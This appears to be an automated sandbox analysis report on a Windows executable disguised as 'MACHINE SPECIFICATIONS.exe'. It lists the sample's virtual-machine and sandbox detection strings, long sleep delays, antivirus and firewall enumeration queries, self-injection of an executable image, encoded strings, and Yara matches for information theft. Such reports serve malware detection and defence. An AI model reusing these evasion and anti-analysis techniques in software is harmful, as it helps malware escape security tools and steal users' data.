                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49750
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.268722356.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6072Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 6072Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWindow / User API: threadDelayed 3238Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWindow / User API: threadDelayed 5206Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.342608812.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: Q2ljJWprY2t7ITWRsdk1xY2pLYWtlYmhifFZ4fmdxZ395fw==AJkJqYmprY2t7KUxiYHlrfXl/dT06Ow==9dG5tb1dxdG54Wm97bX9ve39jIyc=ITWRsdk1xY2pNcX55bW56XXV1UXt1e3hydA==9RXl2cWVmcicuW29vLE5mbn5/d38=ITWRsdk1xY2pNcX55bW56SGJ0d31XfXd5dnx2ARXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==ITWRsdk1xY2pNcX55bW56TXxkd1B8dHh5fXU=9RXl2cWVmcicuS2Z+aS1NZ3F/fHZ49dG5tb1dxdG54Wm97bX9ve39jIyU=1TWRsdk1xY2pKe2NsZHlgamNi)JkNwamNtcmltenklIiM=1TWRsdk1xY2pLZmR/fmx9ew==!JkJtbXB3Z3R8JyQl1TWRsdk1xY2pbaH5+fmx6Zn9/)JlJjd3F3Z3NhZmQlIiM=ATWRsdk1xY2pPaGdmbU5hfWJ0cWd9eng=9JkZjbmlkJkRne3hub3lnYH4/PD0=9dG5tb1dxdG54Wm97bX9ve39jJw==9TWRsdk1xY2pAWkZNZWF6amJ4fHQ=1JklRTyRDb2t8bHhiYmogIT4=9TWRsdk1xY2pAfG9GY2lnaXl0YA==1SHRnIyJIaWNhb2NufiMgIQ==)TWRsdk1xY2pNb2xub3l9
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuW29vLE5mbn5/d38=
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuTnhuaWMuTHhwfH1xeQ==
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000003.342608812.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareU4X6_KOCWin32_VideoControllerTCGRV46UVideoController120060621000000.000000-000..913.3.display.infMSBDAKMRWUGE3PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsYFLP8K4C~
                        Source: MACHINE SPECIFICATIONS.exeBinary or memory string: RXl2cWVmcicuS2Z+aS1NZ3F/fHZ4
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: MACHINE SPECIFICATIONS.exe, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/XZCW51nE.csReference to suspicious API methods: ('nZGFXFr9', 'GetProcAddress@kernel32'), ('nBIDpmm9', 'LoadLibrary@kernel32')
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.372098837.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
